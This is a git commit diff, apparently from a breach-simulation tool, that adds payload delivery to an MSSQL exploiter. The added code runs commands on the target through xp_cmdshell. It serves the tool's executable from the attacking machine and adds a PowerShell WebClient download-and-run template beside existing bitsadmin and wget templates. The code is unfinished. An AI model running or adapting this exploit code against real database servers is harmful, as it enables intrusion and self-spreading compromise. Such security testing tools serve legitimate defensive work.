Payload creation

2019-05-13 14:08:30 +03:00 · 2019-05-13 14:08:30 +03:00 · d2b5e314c1
parent 75f26f921e
commit d2b5e314c1
4 changed files with 3462 additions and 3431 deletions
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@ -3,8 +3,12 @@ import logging

 import pymssql

-from infection_monkey.exploit import HostExploiter, mssqlexec_utils
+from infection_monkey.exploit import HostExploiter, mssqlexec_utils, tools
 from common.utils.exploit_enum import ExploitType
+from infection_monkey.exploit.tools import HTTPTools
+from infection_monkey.config import WormConfiguration
+from infection_monkey.model import RDP_CMDLINE_HTTP
+

 __author__ = 'Maor Rayzin'

@ -73,6 +77,31 @@ class MSSQLExploiter(HostExploiter):

        chosen_attack = self.attacks_list[0](payload, cursor, self.host)

+
+
+
+        # Get monkey exe for host and it's path
+        src_path = tools.get_target_monkey(self.host)
+        if not src_path:
+            LOG.info("Can't find suitable monkey executable for host %r", self.host)
+            return False
+        # Create server for http download and wait for it's startup.
+        http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
+        if not http_path:
+            LOG.debug("Exploiter failed, http transfer creation failed.")
+            return False
+        # TODO choose bit version
+        dst_path = WormConfiguration.dropper_target_path_win_64
+        dst_path = "c:\\windows\\temp\\monkey64.exe"
+
+        command = RDP_CMDLINE_HTTP % {'http_path': http_path, 'monkey_path': dst_path}
+        LOG.info("Started http server on %s", http_path)
+        tmp_file_path = "c:\\windows\\temp\\monkey_tmp.bat"
+        commands = [r"xp_cmdshell 'echo powershell (new-object System.Net.WebClient).DownloadFile(\" > %s'" % tmp_file_path]
+        commands2 = [r"xp_cmdshell 'echo powershell >> c:\\windows\\temp\\temp.bat'"]
+        chosen_attack.execute_command(commands2)
+
+
        if chosen_attack.send_payload():
            LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
            if chosen_attack.execute_payload():
--- a/monkey/infection_monkey/exploit/mssqlexec_utils.py
+++ b/monkey/infection_monkey/exploit/mssqlexec_utils.py
@ -5,6 +5,7 @@ import logging
 import pymssql

 from infection_monkey.exploit.tools import get_interface_to_target
+from infection_monkey.network.info import get_free_tcp_port
 from pyftpdlib.authorizers import DummyAuthorizer
 from pyftpdlib.handlers import FTPHandler
 from pyftpdlib.servers import FTPServer
@ -21,6 +22,8 @@ FTP_SERVER_PASSWORD = 'force'
 FTP_WORK_DIR_WINDOWS = os.path.expandvars(r'%TEMP%/')
 FTP_WORK_DIR_LINUX = '/tmp/'

+UPLOAD_COMMANDS = []
+
 LOG = logging.getLogger(__name__)


@ -54,7 +57,7 @@ class FTP(object):
        handler = FTPHandler
        handler.authorizer = authorizer

-        address = (get_interface_to_target(self.dst_ip), FTP_SERVER_PORT)
+        address = (get_interface_to_target(self.dst_ip), get_free_tcp_port())

        # Configuring the server using the address and handler. Global usage in stop_server thats why using self keyword
        self.server = FTPServer(address, handler)
@ -103,6 +106,29 @@ class CmdShellAttack(AttackHost):
        self.ftp_server, self.ftp_server_p = self.__init_ftp_server(host)
        self.cursor = cursor
        self.attacker_ip = get_interface_to_target(host.ip_addr)
+        self.host = host
+
+    def execute_command(self, cmds):
+        ftp_server, ftp_server_p = self.__init_ftp_server(self.host)
+        if ftp_server_p and ftp_server:
+            #command = "xp_cmdshell \""+cmd+"\""
+            #command = "xp_cmdshell \"C:\\download.bat\""
+            #command = "EXEC xp_cmdshell \"c:\\download.bat\""
+
+
+            try:
+                # Running the cmd on remote host
+                for cmd in cmds:
+                    self.cursor.execute(cmd)
+                    sleep(0.5)
+            except Exception as e:
+                LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
+                self.ftp_server_p.terminate()
+                return False
+            return True
+        else:
+            LOG.error("Couldn't establish an FTP server for the dropout")
+            return False

    def send_payload(self):
        """
--- a/monkey/infection_monkey/model/init.py
+++ b/monkey/infection_monkey/model/init.py
@ -18,6 +18,7 @@ DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del

 # Commands used for downloading monkeys
 POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
+POWERSHELL_UPLOAD_SHORT = "powershell (new-object System.Net.WebClient).DownloadFile('%(http_path)s','%(monkey_path)s')"
 WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
 RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
 CHMOD_MONKEY = "chmod +x %(monkey_path)s"
--- a/monkey/monkey_island/cc/ui/package-lock.json
+++ b/monkey/monkey_island/cc/ui/package-lock.json